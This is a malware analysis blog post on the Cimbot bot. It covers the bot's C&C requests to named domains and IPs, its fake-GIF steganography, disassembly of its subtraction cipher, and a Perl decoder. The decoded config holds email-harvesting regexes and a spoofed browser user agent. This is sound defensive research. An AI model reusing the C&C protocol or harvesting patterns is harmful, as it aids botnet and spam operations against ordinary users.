Cimbot - A Technical Analysis

Personal Exposition

I was recently sent a .pcap file of a bot's C&C communications. Every 182 seconds, the bot would download a GIF file from vazasaki-ji.info (91.211.65.180 as of Mar 11, 2009). These GIF files however are not well-formed — that is to say, it's a GIF89a header, followed by a lot of random gibberish.

At last! Something interesting and clever (this will make a good blog post). I've been wondering why it took so long for the bot authors to try to hide their communications steganographically (albeit poorly in this case).
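The observation that the downloads are a GIF89a header followed by gibberish suggests a cheap structural check a proxy or IDS can apply instead of trusting Content-Type. The following is an added example, not code from the original post: it walks the GIF container structure (signature, logical screen descriptor, colour tables, extension and image blocks, trailer) without decoding pixel data, rejects anything that does not parse, and is run on the first 16 bytes of the fake GIF from the hexdump further down and on a minimal valid GIF constructed here.

```python
"""Structural sanity check for the fake GIFs Cimbot fetches from its C&C.

Added example, not code from the original post. A real GIF is a signature,
a logical screen descriptor, optional colour tables, then a chain of
extension (0x21) and image (0x2C) blocks ending in a trailer (0x3B). The
bot's downloads are a GIF89a header followed by cipher bytes, so walking
that structure (no LZW decoding needed) rejects them at the first block
introducer. CIMBOT_FAKE_GIF_HEAD is the first 16 bytes from the post's
hexdump; MINIMAL_GIF is a constructed 1x1 image that must pass.
"""

# First row of the fake GIF hexdump in the post.
CIMBOT_FAKE_GIF_HEAD = bytes.fromhex("47494638396103b2058926c25f9936ca")

# Constructed: smallest well-formed GIF89a (1x1, two-entry palette, one image block, trailer).
MINIMAL_GIF = bytes.fromhex(
    "474946383961" "01000100800000"      # signature, 1x1, global colour table flag set
    "000000ffffff"                        # 2-colour global colour table
    "2c00000000010001000002024401003b")   # image descriptor, LZW data, trailer


def skip_subblocks(data, pos):
    """Advance past length-prefixed sub-blocks up to and including the 0x00 terminator.
    Returns the new offset, or None if the data runs out first."""
    while pos < len(data):
        n = data[pos]
        pos += 1 + n
        if n == 0:
            return pos
    return None


def check_gif(data):
    """Return (ok, reason). ok is True only when data parses as one complete GIF."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return False, "no GIF signature"
    packed = data[10]                      # logical screen descriptor packed field
    pos = 13
    if packed & 0x80:                      # global colour table present
        pos += 3 * (2 << (packed & 0x07))
    while pos < len(data):
        tag = data[pos]
        if tag == 0x3B:
            return True, "valid GIF, %d bytes" % (pos + 1)
        if tag == 0x21:                    # extension: introducer, label, sub-blocks
            pos += 2
        elif tag == 0x2C:                  # image descriptor: 9 bytes after the introducer
            if pos + 10 > len(data):
                return False, "truncated image descriptor at offset %d" % pos
            ipacked = data[pos + 9]
            pos += 10
            if ipacked & 0x80:             # local colour table
                pos += 3 * (2 << (ipacked & 0x07))
            pos += 1                       # LZW minimum code size
        else:
            return False, "bad block introducer 0x%02x at offset %d" % (tag, pos)
        pos = skip_subblocks(data, pos)
        if pos is None:
            return False, "truncated sub-block chain"
    return False, "no trailer (truncated at offset %d)" % len(data)


if __name__ == "__main__":
    for name, blob in (("cimbot sample", CIMBOT_FAKE_GIF_HEAD), ("minimal gif", MINIMAL_GIF)):
        print(name, check_gif(blob))
```

On the Cimbot sample the walk stops at offset 13, where a real file would carry an extension or image block introducer.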

At first I didn't have a sample of this bot, only its communications. Just eyeballing a hexdump of the data revealed some very strong patterns. It was safe to assume that this was a home-brew enciphering routine; I speculated that it was just a sixteen (or some multiple of sixteen) byte pattern, repeatedly XOR'd over the plaintext. Performing some statistical analysis of every nth byte of the cyphertext (for n = 1 .. 16) showed some very strong language-like patterns. There were only about 80 to 90 distinct bytes per nth column of cyphertext, about what you'd expect for printable ASCII, and there was a slight power-law distribution of those bytes, rather than the high-entropy flat distribution that a good encryption algorithm would produce.

Most home-brew cryptosystems like this are trivial to crack, so I started on a cyphertext-only cryptanalysis, and got pretty far along, until I received a Cimbot sample from Joe Stewart [SecureWorks]. And then I could cheat by just analyzing the binary code of the bot itself.

The Technical Part

Cimbot is written in Microsoft Visual C++. According to the PE headers of the sample I have now, it was compiled/linked on Tue Mar 25 04:31:15 2008 (but that's not always trustworthy). The bot sample I received communicates with sufujilisi.info (91.212.65.94 as of Mar 11, 2009), and does not use SSL — though I strongly suspect that more recent versions do. (As an aside: if anyone reading this has more Cimbot samples, please feel free to send them to me.)

This Cimbot sample is a module of a larger malware system; the other part is what actually starts up on boot and then loads Cimbot (stored encrypted on disk) into memory. Cimbot doesn't execute on its own. When executed, Cimbot sets a pseudo-random registry key (which it frequently polls) and spawns a second thread (you know, all the usual stuff). It then calls GetTickCount() in a loop, Sleep()ing for a second each time and checking whether 60 seconds have passed; there are some calls to rand() in there too. Once the tick count is above a certain value, it makes an HTTP request to log in to the C&C server. It isn't really setting any state — just waiting — so if you're too ADHD to wait through all of this in a debugger, you can just flip the ZF bit when you get to that branch. (Or modify that jump instruction in the binary; the bot doesn't do any integrity checking.)

During initialization (before the loop I just mentioned) it calls GetVolumeInformationA() to get the VolumeSerialNumber of the system drive. It uses this value to generate an identity, which is used when initially logging into the C&C server… and… for decrypting (really deobfuscating) the encoded GIF data.

First Example

(Note that these examples have been scrubbed for anything which would reveal a victim's IP address or my own.)

The first thing the bot sends is the request below. The hex string starting C63B220838F1 is the bot's unique identity, and it is also the crypto key.

GET /account/l.php?C63B220838F11B0F8A09E9A317C1E4871879BF928D232D8D8C0D HTTP/1.1
Host: sufujilisi.info
Accept: */*
Connection: close

The C&C will send back something like this:

HTTP/1.1 200 OK
Date: Thu, 12 Mar 2009 01:43:05 GMT
Server: Apache/2.0.58 (Win32) PHP/5.1.4
X-Powered-By: PHP/5.1.4
Set-Cookie: PHPSESSID=47d3066a386f5532af8a1d69c46c4896; path=/
Content-Length: 0
Connection: close
Content-Type: text/html

The bot then uses that PHPSESSID cookie for all further communications with the C&C.

The next thing that the bot will ask for is:

GET /account/d.php?data=7ef326c40791673eef9768c8921aaec4daf0 HTTP/1.1
Host: sufujilisi.info
Accept: */*
Connection: close
Cookie: PHPSESSID=47d3066a386f5532af8a1d69c46c4896

I only skimmed through the part where it calculates the value after ?data= (7ef326c4... in this example); I can figure it out later if anyone cares. I've noticed that the last two bytes (daf0 in this example) change over time.

So the C&C server sends back something like this (with the fake GIF hexified here, for your blogging pleasure):

HTTP/1.1 200 OK
Date: Thu, 12 Mar 2009 02:25:39 GMT
Server: Apache/2.0.58 (Win32) PHP/5.1.4
X-Powered-By: PHP/5.1.4
Content-Length: 2641
Connection: close
Content-Type: image/gif

00000000 47 49 46 38 39 61 03 b2 05 89 26 c2 5f 99 36 ca |GIF89a....&._.6.|

00000010 48 26 12 38 f1 dc 0a 2a 09 e9 a3 17 c1 e4 87 e6 |H&.8...*........|

00000020 3b 22 08 38 f1 5b 0f 8a 09 e9 a3 58 c1 e8 87 c6 |;".8.[.....X....|

00000030 3b a2 f6 6e f1 5d 0f 8b 09 e9 a3 1a 04 e4 8b c6 |;..n.]..........|

00000040 3b 22 68 22 f1 1b 53 8a 0d e9 a3 17 e1 a3 89 c6 |;"h"..S.........|

00000050 3c 22 37 38 f1 1b 35 8a 38 51 15 7c 27 40 fa f0 |<"78..5.8Q.|'@..|

00000060 97 5f 64 ab 1b 43 6b ac 85 45 ca 40 00 0c b5 f0 |._d..Ck..E.@....|

00000070 7a 4b 63 94 22 77 4d e6 30 45 c5 74 f0 4d 89 ea |zKc."wM.0E.t.M..|

00000080 6d 86 08 38 f1 1d 0f 15 09 e9 a3 93 c1 13 af 21 |m..8...........!|

00000090 9c 4f 82 68 1e 54 6b b7 66 64 d4 43 f4 14 04 ef |.O.h.Tk.fd.C....|

000000a0 97 95 83 68 1d 50 8c b2 31 45 fe 45 3c 14 b3 f7 |...h.P..1E.E<...|

000000b0 6d 9f 64 95 1a 97 4f 06 31 45 ff 3c f5 14 b0 ef |m.d...O.1E.<....|

000000c0 97 95 83 68 1d 50 8c b2 64 4a d0 91 f1 11 c0 22 |...h.P..dJ....."|

000000d0 68 7e 36 95 6c 4c 3b bd 39 66 cc 73 34 5f b7 f2 |h~6.lL;.9f.s4_..|

000000e0 70 9f 30 60 4d 76 3d 05 39 15 d4 49 3e 40 e4 ef |p.0`Mv=.9..I>@..|

000000f0 b7 7e 36 61 4d 8e 8a ba 35 1e 20 3f 1c 45 b4 40 |.~6aM...5. ?.E.@|

00000100 98 9d 3a 64 25 98 38 b9 72 f1 c7 48 01 08 bc f4 |..:d%.8.r..H....|

00000110 5f 5a 6c 38 f1 1b 12 8a 20 e9 a3 17 d3 e4 b6 ee |_Zl8.... .......|

00000120 ae 8b 6c 75 4c 7c 3c f0 39 16 dc 74 eb 0d b6 2f |..luL|<.9..t.../|

00000130 3d 46 39 3b f1 36 0f 8a 09 ff a3 46 e9 57 ec 39 |=F9;.6.....F.W.9|

00000140 ae 8b 77 a6 2e 76 70 b7 6f 19 d0 50 1e 0e b0 f5 |..w..vp.o..P....|

00000150 a4 24 2c 69 f4 1b 26 8a 09 e9 b5 17 f0 0c ea 2f |.$,i..&......../|

00000160 9f 5f 63 99 1e 81 3f b7 42 46 cd 40 f0 4d 89 ea |._c...?.BF.@.M..|

00000170 6c 25 08 4d f1 1b 0f 9a 09 18 cb 8a fe 3f e8 f3 |l%.M.........?..|

00000180 a1 52 35 71 4e 45 38 b9 72 eb c7 48 c4 e4 96 c6 |.R5qNE8.r..H....|

00000190 3b 22 12 38 20 43 6b ad 37 13 cc 3b f0 4d 89 ea |;".8 Ck.7..;.M..|

000001a0 6c 26 08 0b f1 1b 0f 5b 09 18 ff 45 e9 4b f0 2c |l&.....[...E.K.,|

000001b0 64 9e 30 a2 61 82 38 06 31 59 11 7e ea 60 af 2d |d.0.a.8.1Y.~.`.-|

000001c0 b5 4b 84 60 6b 84 7f b3 85 11 15 78 33 0d 03 ee |.K.`k......x3...|

000001d0 a8 92 3b 61 6d 43 74 02 6e 12 1f 3f 2b 54 ec 2d |..;amCt.n..?+T.-|

000001e0 64 9e 30 af 52 91 38 06 31 4a 15 81 ea 60 af 3a |d.0.R.8.1J...`.:|

000001f0 9c 94 31 b4 19 8f 76 04 32 65 cb 78 24 49 b0 42 |..1...v.2e.x$I.B|

00000200 63 96 71 9e 1a 97 37 ec 76 59 cc 93 e9 45 fd 2f |c.q...7.vY...E./|

00000210 64 9e 30 ac 52 8d 38 06 31 59 07 7d ea 60 af 28 |d.0.R.8.1Y.}.`.(|

00000220 b5 4b 84 60 53 95 41 b3 85 11 10 8a 2a 0d 03 ee |.K.`S.A.....*...|

00000230 9e 83 6a 61 6d 43 73 f6 75 12 1f 3f 34 5d fa ef |..jamCs.u..?4]..|

00000240 b7 4a 3b 9f 61 44 8b b2 7c 52 16 40 3d 0c fa 2f |.J;.aD..|R.@=../|

00000250 ae 9a 31 b4 19 88 7f f1 32 65 cb 84 31 49 ee ef |..1.....2e..1I..|

00000260 b7 4a 71 9b 60 44 8b b2 7c 60 09 40 3d 0c fe 33 |.Jq.`D..|`.@=..3|

00000270 b1 4b 84 60 68 88 70 b3 38 52 a7 17 dd e4 87 c6 |.K.`h.p.8R......|

00000280 55 22 37 60 5e 7c 78 f6 7d 58 dd 40 3d 0c f1 27 |U"7`^|x.}X.@=..'|

00000290 b1 83 7b 9b 63 84 7f fe 43 12 d2 80 c7 e4 8b c6 |..{.c...C.......|

000002a0 3b 22 48 45 f4 1b 16 8a 47 e9 a3 17 fe 31 f6 40 |;"HE....G....1.@|

000002b0 a4 8e 74 99 20 4f 3d ba 29 11 06 86 2e 54 e8 3a |..t. O=.)....T.:|

000002c0 a4 84 74 9d 2c 3b 5c dd 52 2e c3 4d ef 14 c2 e6 |..t.,;\.R..M....|

000002d0 92 8b 76 9c 60 92 82 aa 57 3d c3 4c ef 15 c2 e6 |..v.`...W=.L....|

000002e0 8e 78 39 73 11 49 5d cf 5d 12 aa 17 0c e4 87 c6 |.x9s.I].].......|

000002f0 85 6f 77 b2 5a 87 7b eb 38 1d d1 47 e1 0c ea 35 |.ow.Z.{.8..G...5|

00000300 a8 92 69 ac 5a 7d 7b ef 44 09 f0 6a 0a 29 a7 fc |..i.Z}{.D..j.)..|

00000310 69 52 43 58 48 84 7d ee 78 60 16 37 0f 38 a7 fb |iRCXH.}.x`.7.8..|

00000320 69 53 43 58 44 71 40 c5 29 17 f1 5c 15 04 ca 12 |iSCXDq@.)..\....|

00000330 8d 42 39 66 22 49 43 bd 3b 1b cc 1e c1 3f 87 c6 |.B9f"IC.;....?..|

00000340 3b 7c 55 a7 6b 84 7b f6 6a 18 d8 45 f1 04 af 1d |;|U.k.{.j..E....|

00000350 a4 90 6c a7 68 8e 4a aa 5e 24 c3 6e 2a 52 eb 35 |..l.h.J.^$.n*R.5|

00000360 b2 95 28 86 45 3b 44 b8 3a 24 c3 7c 2f 11 dc 19 |..(.E;D.:$.|/...|

00000370 76 42 7a ae 2b 4c 3d c2 37 19 d1 4e ea 04 ce 2b |vBz.+L=.7..N...+|

00000380 9e 8d 77 67 23 4b 3f c0 39 22 d3 50 e1 2a f0 38 |..wg#K?.9".P.*.8|

00000390 a0 88 77 b0 20 4c 3d bf 37 19 d1 4e c8 e4 e6 c6 |..w. L=.7..N....|

000003a0 3b 22 66 85 60 95 78 f6 75 4a d2 4b ef 14 a7 ee |;"f.`.x.uJ.K....|

000003b0 9e 91 75 a8 52 8f 78 ec 75 4e de 37 0e 37 d0 0b |..u.R.x.uN.7.7..|

000003c0 5b 58 36 68 2c 3b 66 f3 77 4d 12 8e 34 04 d5 1a |[X6h,;f.wM..4...|

000003d0 5b 57 36 69 2c 3b 62 e0 3a 24 c3 45 0f 29 db e6 |[W6i,;b.:$.E.)..|

000003e0 7e 6e 5a 58 22 49 40 b8 3d 1c d5 49 fc 04 b5 14 |~nZX"I@.=..I....|

000003f0 80 76 28 7b 3d 6d 2f bc 37 19 d1 4c f1 1b b9 fd |.v({=m/.7..L....|

00000400 64 29 08 6b f1 1b 0f bc 56 58 1d 80 2d 50 e8 f5 |d).k....VX..-P..|

00000410 6f 50 38 58 19 7e 7e f7 79 4a 17 80 23 50 ec 01 |oP8X.~~.yJ..#P..|

00000420 5b 6f 5b 81 36 3b 45 b8 39 24 c3 6e 2a 52 eb 35 |[o[.6;E.9$.n*R.5|

00000430 b2 95 28 86 45 3b 44 b8 3a 12 aa 17 18 e4 87 c6 |..(.E;D.:.......|

00000440 91 6f 77 b2 5a 87 7b eb 38 1d d1 47 e1 0c ea 35 |.ow.Z.{.8..G...5|

00000450 a8 92 69 ac 5a 7d 7b ef 44 09 f0 6a 0a 29 a7 fc |..i.Z}{.D..j.)..|

00000460 69 52 43 58 48 84 7d ee 78 60 16 37 0f 38 a7 fb |iRCXH.}.x`.7.8..|

00000470 69 53 43 58 44 71 40 c5 29 17 f1 5c 15 04 ca 12 |iSCXDq@.)..\....|

00000480 8d 42 39 66 22 49 43 bd 3b 1b de 37 0a 52 ed 35 |.B9f"IC.;..7.R.5|

00000490 8b 83 7c a0 1f 4c 38 92 09 ec a3 17 c1 e6 ec 34 |..|..L8........4|

000004a0 44 22 25 38 f1 1b 2a 8a 5b 4e 09 7c 33 49 f9 00 |D"%8..*.[N.|3I..|

000004b0 5b 8a 7c ac 61 55 3e b9 75 4e 11 8c 38 12 ea 35 |[.|.aU>.uN..8..5|

000004c0 a8 2f 12 41 f1 36 0f 8a 09 02 a3 69 26 4a ec 38 |./.A.6.....i&J.8|

000004d0 a0 94 42 58 59 8f 83 fa 43 18 d2 7b 26 5a e8 3d |..BXY...C..{&Z.=|

000004e0 69 85 77 a5 fa 1b 2a 8a 09 e9 bc 17 13 49 ed 2b |i.w...*......I.+|

000004f0 ad 87 7a 72 11 83 83 fe 79 23 d2 46 25 49 fd 27 |..zr....y#.F%I.'|

00000500 b2 50 6b a7 5e 24 0f a5 09 e9 a3 30 c1 36 ec 2c |.Pk.^$.....0.6.,|

00000510 a0 94 6d aa 2b 3b 77 fe 7d 59 dd 46 f0 48 ec 3c |..m.+;w.}Y.F.H.<|

00000520 9c 99 36 9b 60 88 18 8a 24 e9 a3 17 da e4 d9 2b |..6.`...$......+|

00000530 a1 87 7a 9d 63 55 2f f2 7d 5d 13 51 f0 13 f3 2b |..z.cU/.}].Q...+|

00000540 a9 97 7f 66 54 8a 7c 93 09 04 a3 17 c1 fd 87 18 |...fT.|.........|

00000550 a0 88 6d aa 56 8d 49 aa 71 5d 17 87 fb 13 b6 32 |..m.V.I.q].....2|

00000560 a0 90 7d af 1f 7e 7e f7 12 e9 a5 17 c1 e4 87 c6 |..}..~~.........|

00000570 44 22 0a 38 f1 1b 0f 8a 12 e9 a5 17 c1 e4 87 c6 |D".8............|

*

00000860 45 22 0c 38 f1 1b 8f a4 0f e9 ae 17 c2 e4 87 c6 |E".8............|

00000870 3c 2e 08 39 f1 1b 0f 8b 15 ea a4 17 c1 e4 88 d2 |<..9............|

00000880 3d 23 08 38 f1 1d 1b 8d 0a e9 a3 17 c5 f0 8b c7 |=#.8............|

00000890 3b 22 08 3b fd 20 10 8a 09 e9 a8 23 c7 e5 87 c6 |;".;. .....#....|

000008a0 3b 27 14 3f f2 1b 0f 8a 0e f5 ab 18 c1 e4 87 cb |;'.?............|

000008b0 47 2b 09 38 f1 1b 14 97 09 ea a3 17 c1 e5 95 c6 |G+.8............|

000008c0 3f 22 08 38 41 de 0f 8a 18 e9 a4 17 c1 e4 88 d7 |?".8A...........|

000008d0 3b 4a 08 38 f1 41 0f b9 67 11 fe 78 ee 5e b7 f3 |;J.8.A..g..x.^..|

000008e0 74 7e 35 95 6c 4c 3b bc 3d 66 cc 73 ef 0c e2 27 |t~5.lL;.=f.s...'|

000008f0 68 9c 64 66 4e 96 41 b6 40 66 cc 3b f0 f5 87 02 |h.dfN.A.@f.;....|

00000900 3b 22 08 72 f1 4a 6d b2 64 4a d0 91 f1 11 c0 22 |;".r.Jm.dJ....."|

00000910 69 7f 83 69 1d 4e 3f 07 32 45 d1 3f 1c 45 b4 40 |i..i.N?.2E.?.E.@|

00000920 6b 4f 41 94 1e 78 8a bb 35 1b d7 94 ea 40 b5 ee |kOA..x..5....@..|

00000930 96 83 35 b2 4d 49 6c 05 3b 15 da 94 ea 08 b6 d8 |..5.MIl.;.......|

00000940 3b 69 08 38 f1 60 0f b9 31 4a 05 8c 34 49 b0 42 |;i.8.`..1J..4I.B|

00000950 63 83 6c a5 5a 89 38 06 31 60 08 79 2e 45 fa 3a |c.l.Z.8.1`.y.E.:|

00000960 a0 94 31 b4 19 8b 7e fd 7d 56 04 8a 35 49 f9 ef |..1...~.}V..5I..|

00000970 b7 4a 70 9d 5d 8b 38 06 31 51 12 8a 35 51 e8 39 |.Jp.].8.1Q..5Q.9|

00000980 af 87 7a 61 6d 43 82 fa 6a 56 cc 46 d4 e4 8b c6 |..zamC..jV.F....|

00000990 3b 22 90 4b f2 1b 30 8a 0a e9 a3 17 c2 05 88 c7 |;".K..0.........|

000009a0 3b 22 08 39 12 1d 10 8a 09 e9 a5 38 c4 e5 87 c6 |;".9.......8....|

000009b0 3b 40 29 3c f2 1b 0f 8a 0f 0a a8 18 c1 e4 87 cd |;@)<............|

000009c0 5c 28 09 38 f1 1b 17 ab 10 ea a3 17 c1 ed a8 ce |\(.8............|

000009d0 3c 22 08 38 fb 3c 18 8b 09 e9 a3 26 e3 e4 8c c6 |<".8.<.....&....|

000009e0 3b 22 0c 5d 3e 61 34 ad 09 ea a3 17 c1 e5 ab c6 |;".]>a4.........|

000009f0 40 22 08 38 f5 40 57 d8 2e 0e a3 19 c1 e4 87 2a |@".8.@W........*|

00000a00 3b 48 08 3c f1 1b 0f ba 7e e9 a3 3e c1 ec 87 c6 |;H.<....~..>....|

00000a10 3b 02 9b 3c f1 bb ca 97 09 f8 c5 17 c1 e4 a3 c6 |;..<............|

00000a20 60 74 49 86 35 7a 5b e9 3d 48 db 3c ef xx xx xx |`tI.5z[.=H.<. |

00000a30 xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx | |Redacted

00000a40 45 23 08 38 f1 1e 2f 90 09 e9 a3 72 95 25 e5 81 |E#.8../....r.%..|

00000a50 3c |<|

00000a51

(You see what I mean about the patterns mod sixteen. The high nibble of each byte stays within a range of only one or two adjacent values, and some values repeat exactly from one column to the next.)

The Decoding Operation

[Drum Roll] So, this is the decryption routine. Yes, this really is all there is to it: it's just a subtraction operation.

; Attributes: bp-based frame

sub_403635      proc near               ; CODE XREF: sub_403587+21↑p

key             = dword ptr  8
sixteen         = dword ptr  0Ch
cyphertext      = dword ptr  10h
text_length     = dword ptr  14h
index           = esi

                push    ebp
                mov     ebp, esp
                push    index
                xor     index, index
                cmp     [ebp+text_length], index ; Test for a zero length (index is 0 here)
                jbe     short loc_40365B        ; nothing to decrypt, so return

decypher_loop:                          ; CODE XREF: sub_403635+24↓j
                mov     eax, [ebp+cyphertext]
                xor     edx, edx
                lea     ecx, [index+eax]        ; ECX points to the current byte of the cyphertext
                mov     eax, index
                div     [ebp+sixteen]           ; EDX = index mod 16, i.e. basically index&0x0F
                mov     eax, [ebp+key]
                mov     al, [edx+eax]           ; AL is the byte of the 'key'
                sub     [ecx], al               ; The decryption function itself.
                inc     index
                cmp     index, [ebp+text_length]
                jb      short decypher_loop

loc_40365B:                             ; CODE XREF: sub_403635+9↑j
                pop     index
                pop     ebp
                retn    10h
sub_403635      endp

It's called like this: the pointer to the GIF89a buffer is advanced by 15 bytes (and the length reduced accordingly), so those 15 bytes are left undecrypted; then the first 10h (16) bytes of the bot's C63B220838F11B0F8A09E9A317C1E4871879BF928D232D8D8C0D identity (stored as raw bytes in memory, not as the hex string) are used as the subtraction key.

sub_403587      proc near               ; CODE XREF: sub_401717+6C6↑p
                                        ; sub_40201F+13C↑p

arg_0           = dword ptr  4

                mov     edx, [esp+arg_0]
                mov     eax, [edx]
                cmp     eax, 0Fh                ; Test that the GIF is at least 0Fh (15) bytes long
                jnb     short long_enough
                xor     eax, eax                ; too short: return 0
                jmp     short locret_4035B0

long_enough:                            ; CODE XREF: sub_403587+9↑j
                add     eax, 0FFFFFFF1h         ; length - 15
                push    eax                     ; Length of (*GIF89a-15)
                mov     eax, [edx+4]
                add     eax, 0Fh
                push    eax                     ; 15 bytes from the start of GIF89a
                push    10h                     ; First sixteen bytes of...
                push    offset the_bot_id       ; The bot ID/key
                call    sub_403635
                push    1
                pop     eax                     ; return 1 (success)

locret_4035B0:                          ; CODE XREF: sub_403587+D↑j
                retn    4
sub_403587      endp

So the following quickly written Perl script should decrypt this particular (so-called) GIF file:

#!/usr/bin/perl
use strict;
use warnings;

# The first sixteen bytes of the bot's login string are the subtraction key.
my @key = ( 0xC6, 0x3B, 0x22, 0x08, 0x38, 0xf1, 0x1b, 0x0f,
            0x8a, 0x09, 0xe9, 0xa3, 0x17, 0xc1, 0xe4, 0x87 );

# If you're too lazy to retype the bot's login string as a byte array,
# you can do something like this (pack "H32" keeps only the first 16 bytes):
# my @key = map { ord } split(//, pack("H32",
#     "C63B220838F11B0F8A09E9A317C1E4871879BF928D232D8D8C0D"));
# You see, it's equivalent:
# print "( ", join(", ", map { sprintf("0x%02x", $_) } @key), " );\n";

# You don't have to read all of the input file into memory either,
# I'm just being lazy.
my $file = shift or die "usage: $0 fake.gif > decoded.bin\n";
open(my $in, '<', $file) or die "can't open $file: $!\n";
binmode($in);      # raw bytes in, raw bytes out (matters on Windows)
binmode(STDOUT);
my $everything = do { local $/; <$in> };
close($in);

my @bytes  = unpack("C*", $everything);
my $length = scalar @bytes;
my $keylen = scalar @key;   # 16 ($#key would be 15, the last index)
my $offset = 15;            # the bot skips the first fifteen bytes
die "$file is shorter than $offset bytes\n" if $length < $offset;

# Do nothing for the first fifteen bytes.
print pack("C*", @bytes[0 .. $offset - 1]);

# Then start subtracting.  The bot's index starts at 0 on the 16th byte,
# so ciphertext byte $i is decoded with $key[($i - $offset) % 16].
for (my $i = $offset; $i < $length; $i++) {
    print pack("C", ($bytes[$i] - $key[($i - $offset) % $keylen]) & 0xFF); # Sooper-dooper encryption!
}

0; # The end

This is the result (hexified here for blogging purposes). It's much more legible now...

00000000 47 49 46 38 39 61 03 b2 05 89 26 c2 5f 99 36 04 |GIF89a....&._.6.|

00000010 0d 04 0a 00 00 c1 fb a0 00 00 00 00 00 00 00 20 |............... |

00000020 00 00 00 00 00 40 00 00 00 00 00 41 00 04 00 00 |.....@.....A....|

00000030 00 80 ee 36 00 42 00 01 00 00 00 03 43 00 04 00 |...6.B......C...|

00000040 00 00 60 ea 00 00 44 00 04 00 00 00 20 bf 02 00 |..`...D..... ...|

00000050 01 00 2f 00 00 00 26 00 2f 68 72 65 66 5c 73 2a |../...&./href\s*|

00000060 5c 3d 5c 73 2a 28 5c 22 7c 5c 27 29 3f 28 2e 2a |\=\s*(\"|\')?(.*|

00000070 3f 29 5b 5c 31 5c 3e 5c 27 5c 22 5d 2f 69 02 24 |?)[\1\>\'\"]/i.$|

00000080 32 64 00 00 00 02 00 8b 00 00 00 7c 00 2f 28 5b |2d.........|./([|

00000090 61 2d 7a 30 2d 39 5c 2d 5d 7b 31 2c 33 30 7d 29 |a-z0-9\-]{1,30})|

000000a0 5c 73 7b 30 2c 35 7d 28 28 5c 5b 2e 7b 30 2c 31 |\s{0,5}((\[.{0,1|

000000b0 32 7d 5c 5d 29 7c 40 7c 28 5c 5c 25 34 30 29 29 |2}\])|@|(\\%40))|

000000c0 5c 73 7b 30 2c 35 7d 28 5b 61 2d 7a 30 2d 39 5c |\s{0,5}([a-z0-9\|

000000d0 2d 5c 2e 5d 7b 31 2c 33 30 7d 29 5c 73 7b 30 2c |-\.]{1,30})\s{0,|

000000e0 35 7d 28 28 5c 5b 2e 7b 30 2c 31 32 7d 5c 5d 29 |5}((\[.{0,12}\])|

000000f0 7c 5c 2e 29 5c 73 7b 30 2c 35 7d 28 5b 61 2d 7a ||\.)\s{0,5}([a-z|

00000100 5d 7b 32 2c 34 7d 29 2f 69 08 24 31 40 24 35 2e |]{2,4})/i.$1@$5.|

00000110 24 38 64 00 00 00 03 00 17 00 00 00 12 00 2f 28 |$8d.........../(|

00000120 73 69 64 3d 5b 61 2d 66 30 2d 39 5d 2a 29 2f 69 |sid=[a-f0-9]*)/i|

00000130 02 24 31 03 00 1b 00 00 00 16 00 2f 28 73 65 73 |.$1......../(ses|

00000140 73 69 6f 6e 3d 5b 61 2d 66 30 2d 39 5d 2a 29 2f |sion=[a-f0-9]*)/|

00000150 69 02 24 31 03 00 17 00 00 00 12 00 2f 28 63 69 |i.$1......../(ci|

00000160 64 3d 5b 61 2d 66 30 2d 39 5d 2a 29 2f 69 02 24 |d=[a-f0-9]*)/i.$|

00000170 31 03 00 15 00 00 00 10 00 2f 28 73 3d 5b 61 2d |1......../(s=[a-|

00000180 66 30 2d 39 5d 2a 29 2f 69 02 24 31 03 00 0f 00 |f0-9]*)/i.$1....|

00000190 00 00 0a 00 2f 28 5c 23 2e 2a 29 24 2f 69 02 24 |..../(\#.*)$/i.$|

000001a0 31 04 00 d3 00 00 00 d1 00 2f 5c 2e 28 67 69 66 |1......../\.(gif|

000001b0 29 7c 28 6a 70 67 29 7c 28 70 6e 67 29 7c 28 67 |)|(jpg)|(png)|(g|

000001c0 7a 29 7c 28 7a 69 70 29 7c 28 72 61 72 29 7c 28 |z)|(zip)|(rar)|(|

000001d0 6d 70 33 29 7c 28 65 78 65 29 7c 28 6a 70 65 67 |mp3)|(exe)|(jpeg|

000001e0 29 7c 28 77 61 76 29 7c 28 61 72 6a 29 7c 28 74 |)|(wav)|(arj)|(t|

000001f0 61 72 29 7c 28 74 67 7a 29 7c 28 61 63 65 29 7c |ar)|(tgz)|(ace)||

00000200 28 74 69 66 29 7c 28 62 6d 70 29 7c 28 61 76 69 |(tif)|(bmp)|(avi|

00000210 29 7c 28 74 61 72 29 7c 28 70 64 66 29 7c 28 62 |)|(tar)|(pdf)|(b|

00000220 7a 29 7c 28 62 7a 32 29 7c 28 6d 73 69 29 7c 28 |z)|(bz2)|(msi)|(|

00000230 63 61 62 29 7c 28 64 6c 6c 29 7c 28 73 79 73 29 |cab)|(dll)|(sys)|

00000240 7c 28 33 67 70 29 7c 28 73 69 73 29 7c 28 73 69 ||(3gp)|(sis)|(si|

00000250 73 78 29 7c 28 6d 70 67 29 7c 28 6d 70 65 67 29 |sx)|(mpg)|(mpeg)|

00000260 7c 28 69 63 6f 29 7c 28 73 77 66 29 7c 28 77 6d ||(ico)|(swf)|(wm|

00000270 76 29 7c 28 77 6d 61 29 2f 69 04 00 1c 00 00 00 |v)|(wma)/i......|

00000280 1a 00 2f 28 6d 61 69 6c 74 6f 3a 29 7c 28 6a 61 |../(mailto:)|(ja|

00000290 76 61 73 63 72 69 70 74 3a 29 2f 69 06 00 04 00 |vascript:)/i....|

000002a0 00 00 40 0d 03 00 07 00 3e 00 00 00 3d 4d 6f 7a |..@.....>...=Moz|

000002b0 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 |illa/4.0 (compat|

000002c0 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20 |ible; MSIE 6.0; |

000002d0 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20 |Windows NT 5.1; |

000002e0 53 56 31 3b 20 2e 4e 45 54 29 07 00 4b 00 00 00 |SV1; .NET)..K...|

000002f0 4a 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f |JMozilla/4.0 (co|

00000300 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 |mpatible; MSIE 6|

00000310 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 |.0; Windows NT 5|

00000320 2e 31 3b 20 53 56 31 3b 20 2e 4e 45 54 20 43 4c |.1; SV1; .NET CL|

